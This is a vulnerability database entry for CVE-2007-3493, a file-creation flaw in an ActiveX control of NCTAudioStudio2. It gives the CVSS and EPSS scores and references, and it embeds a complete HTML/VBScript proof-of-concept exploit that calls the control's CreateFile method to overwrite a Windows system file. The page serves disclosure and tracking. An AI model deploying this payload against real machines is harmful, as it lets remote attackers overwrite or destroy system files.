CVE-2007-3493 : Detail

CVE-2007-3493

4.88%V3
Network
2007-06-29
16h00 +00:00
2017-09-28
10h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

A certain ActiveX control in NCTWavChunksEditor2.dll 2.6.1.148 in NCTAudioStudio (NCTAudioStudio2) 2.7, as used by Sienzo DMM and probably other products, allows remote attackers to create or overwrite arbitrary files via a full pathname in the argument to the CreateFile method, a different product than CVE-2007-3400.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 7.5 AV:N/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 4109

Publication date : 2007-06-25 22h00 +00:00
Author : shinnai
EDB Verified : Yes

<pre> <code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------- <b>NCTAudioStudio2 ActiveX DLL (NCTWavChunksEditor2.dll v. 2.6.1.148) "CreateFile()"Insecure Method</b> url: http://www.nctsoft.com/products/NCTAudioEditor2/ author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org This was written for educational purpose. Use it at your own risk. Author will be not be responsible for any damage. <b><font color="#FF0000">THE EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!</font></b> Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7 all software that use this ocx (for example Sienzo DMM) are vulnerable to this exploits. -------------------------------------------------------------------------------------------------- <object classid='clsid:A77849B6-6125-4466-88DC-4855C014A0C4' id='test'></object> <input language=VBScript onclick=tryMe() type=button value="Click here to start the test"> <script language='vbscript'> Sub tryMe On Error Resume Next Dim MyMsg If(MsgBox("This was written for educational purpose. Use it at your own risk." & vbCrLf & _ "Author will be not be responsible for any damage." & vbCrLf & vbCrLf & _ "THIS EXPLOIT WILL OWERWRITE THE system.ini FILE SO BE SURE TO MAKE A COPY" & _ " OF IT BEFORE RUN THIS EXPLOIT OR YOUR PC WILL NOT RESTART!" & VBcRlF & "ARE YOU" & _ " SURE YOU REALLY WANT TO RUN THIS EXPLOIT?",4)=vbYes) Then test.CreateFile "c:\windows\system_.ini" MyMsg = MsgBox ("Check now the file system.ini" & vbCrLf & "It's overwritten.", 64,"NCTAudioStudio2") Else MyMsg = MsgBox ("Nice, be safe!", 64, "NCTAudioStudio2") End If End Sub </script> </span></span> </code></pre> # milw0rm.com [2007-06-26]

Products Mentioned

Configuraton 0

Microsoft>>Windows_xp >> Version *

Microsoft>>Internet_explorer >> Version 7.0

Nctsoft_products>>Nctaudiostudio >> Version 2.7

    Nctsoft_products>>Nctwavchunkseditor2.dll >> Version 2.6.1.148

      References

      https://www.exploit-db.com/exploits/4109
      Tags : exploit, x_refsource_EXPLOIT-DB
      http://osvdb.org/37673
      Tags : vdb-entry, x_refsource_OSVDB
      http://secunia.com/advisories/25851
      Tags : third-party-advisory, x_refsource_SECUNIA
      http://www.securityfocus.com/bid/24656
      Tags : vdb-entry, x_refsource_BID
      http://www.vupen.com/english/advisories/2007/2351
      Tags : vdb-entry, x_refsource_VUPEN